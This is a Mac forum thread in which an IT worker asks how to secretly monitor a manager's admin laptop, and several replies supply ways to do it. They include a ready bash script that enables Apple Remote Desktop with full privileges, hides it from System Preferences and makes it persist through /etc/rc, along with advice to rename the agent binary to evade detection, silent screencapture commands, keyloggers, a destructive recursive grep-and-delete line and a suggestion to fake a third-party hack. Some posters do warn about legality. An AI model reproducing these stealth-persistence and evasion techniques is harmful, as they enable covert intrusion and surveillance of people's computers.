|
Grey Question... Hidding Remote Desktop or SSH
OK we have someone at work whom is believed to be "messing" around i.e downloading, chatting and even possibly damaging the companies integrity, whilst in the office.
The problem is they are a Manager that uses that uses a full admin account on their laptop. Because sensitive information may be stored on managerial laptops we don't Remote Desktop or SSH these laptops, if there's an issue we physically sit at the machine. I have been asked by a Director if I can report at any given point what applications that person has running or what they are doing. The problem is this person is fairly computer literate and by turning Remote Desktop on and not showing when it is active isn't really inconspicuos enough to gather proof. Does anyone have any suggestions? |
SSH is completely transparent to the console user, but if he knows it's supposed to be turned off it's really obvious that it's been changed. I've never used ARD, but VNC server is invisible IF it's started from the terminal. I do this regularly at my office (the staff aren't evil, they just don't read instructions) . You can detect VNC from the Terminal easily.
There are several keyloggers and screen capture programs for OSX - start at VersionTracker. Some of them pop up a small window until you pay for them, but the shareware fees shouldn't bankrupt you. How well they hide is an issue. Is he likely to poke around in the background processes? Intercepting the mail/net traffic too? Don't need anything on his laptop for that. If I were in your place, I would make it look like his machine had been hacked by a 3rd party - e.g. a hidden account named "0vvn3D" containing either a Star Trek site or gay poяn - something that the observee would never suspect you of. Naturally keep the Directors in the loop. |
The cleanest approach would be to listen to the traffic via the diagnostics port of the switch, that way you don't even have to touch the machine.
Also be extremely careful to get full cover for what you do (in writing, the whole thing has decent chances of ending up in court one way or the other) and if in doubt about the legality of what you're about to do, consult a lawyer. The Eichmann defense (they told me to kill them) doesn't work. Preferably all you do should not only be legal, but also covered by company policy. Finally note that you'd better be on the winning side of this story or you may be looking for a new job real soon... You should at least consider the possibility that the guy who asked you is trying to frame the manager for stuff that might not be work-related and key loggers and other intrusive tricks can't tell private and company use apart, so this is a really tricky subject. Perhaps suggest they hire a PI instead, that way you're out of the loop entirely. |
Thanks for all the comments...
Quote:
This does interest me when you say switch do you refer to the router as our switch is a rackmounted netgear 10/100 switch. The router is a draytek 2800. Which also acts as the DHCP server. |
Quote:
The company lawyer is a good idea. And you said A Director? Singular? How many are there and are they all involved? If this is all legit then the Director shouldn't have any problems sitting down with you and the company lawyer. Record the meeting. |
Quote:
It's dangerous and may be ethically and legally very, very borderline if not beyond. A company lawyer will also place the companies interest before those of digitaljunkie who should make sure to have a very precise understanding of the legal framework for doing this kind of stuff. Quote:
Most rack-mounted models are managed, read the documentation and you'll most probably find some very interesting features for your purpose. Again, be really careful about politics and legality, it's you, not one of them who's gonna be sued, fired or both. |
the magic script ;)
run with sudo ----- #!/bin/bash ### start ARD with all privileges for all users /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate -configure -access -on -privs -ControlObserve -DeleteFiles -TextMessages -OpenQuitApps -RestartShutdown -SendFiles -ChangeSettings -GenerateReports -clientopts -setmenuextra -menuextra no -quiet -agent ### edit /etc/hostconfig so ARD isnt checked in the Sharing pref pane ### badly need some delay here in order for ARD to start correctly and ports 3283 and 5900 to be opened correctly; i have tried with many different values, over 15 seems to be working 100% of the time, made it 20 sec to be sure sleep 20 sed '/ARDAGENT=-YES-/s//ARDAGENT=-NO-/g' < /etc/hostconfig > /tmp/output2 mv /tmp/output2 /etc/hostconfig ### modifying /etc/rc so ARD is started in stealth mode at every boot sed 's/exit 0//' < /etc/rc > /tmp/output1 echo "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate -configure -access -on -privs -ControlObserve -DeleteFiles -TextMessages -OpenQuitApps -RestartShutdown -SendFiles -ChangeSettings -GenerateReports -clientopts -setmenuextra -menuextra no -quiet -agent" >> /tmp/output1 echo "sleep 20" >> /tmp/output1 echo "/usr/bin/sed '/ARDAGENT=-YES-/s//ARDAGENT=-NO-/g' < /etc/hostconfig > /tmp/output2" >> /tmp/output1 echo "/bin/mv /tmp/output2 /etc/hostconfig" >> /tmp/output1 echo "exit 0" >> /tmp/output1 mv /tmp/output1 /etc/rc exit 0 ------ *cough* im not responsable for whatever you do with that, educationnal purpose. |
Quote:
Code:
#!/bin/sh |
hayne, let's p-lease not suppose our guy is a shell scripter ;)
PS: Thx for brining the Light side anyway :D |
Quote:
perl -pi -e 's/ARDAGENT=-YES-/ARDAGENT=-NO-/' /etc/hostconfig |
Maybe you want to add this to the process, but watch the timing as it will take a while to finish. Should only need to be one once, perhaps at reboot with a Console Message "Optimizing File System" to cover the scanning.
nice -n 20 grep -lr 'kill.*ARDAgent' /* 2> /dev/null | xargs rm |
Quote:
:) |
If the guy's smart enough to do that, then we can all go home. He'll notice any monitoring and will be covering his tracks.
|
Quote:
|
Quote:
im such a noob lol thank you a thousand times :) |
Quote:
mv ARDAgent smbmount <substitute any unix-sounding name that isn't being used. Real utilities that aren't used on that box, like `named`, will hide well.> Then adjust references to ARDAgent to the new name in fenrack's script, /etc/hostconfig and Startup Items. With a small amount of work, you can bury it so deep only forensic analysis will find it. Or a port scanner. If ARD doesn't like having it's process name changed, VNC Server doesn't care. |
Just discovered this one - secret screen captures from the shell:
screencapture -mx filename.pdf -m : main monitor; -x : no audio about 80kb per capture, they would need to be copied off fairly regularly. |
Quote:
|
ok ill have a play with those thanks peeps.
I noticed a wireless network thats unprotected and it appears that the person appears to be using that for msn aswell. Is there anyway to prevent their laptop from joining said specified network without actually locking it down? |
Yes, but WLAN is even easier to tap than Ethernet, so why would you do that ?
|
Find out whose wireless network it is and give them a courtesy call. Bring donuts.
|
OK well solution almost fixed we simply had the wireless locked down and made our firewall ruling more strict!
But is there anyway to stop them accessing email through an email client such as mail? I don't seem to be able to block that kind of access as email all runs on the same protocol (ports). i.e they may access hotmail through a mail client such as mail, thunderbird, entourage etc etc... Thanks |
You can block individual hosts/sites through DNS. See the local guru if you are running your own server, or just use the /etc/hosts file:
12.34.56.78 hotmail.com www.hotmail.com hotmail will go wherever you want it to go ;) The double listing is there 'cause it's a little narrow-minded about what matches. |
| All times are GMT -5. The time now is 08:21 AM. |
Powered by vBulletin® Version 3.8.7
Copyright ©2000 - 2014, vBulletin Solutions, Inc.
Site design © IDG Consumer & SMB; individuals retain copyright of their postings
but consent to the possible use of their material in other areas of IDG Consumer & SMB.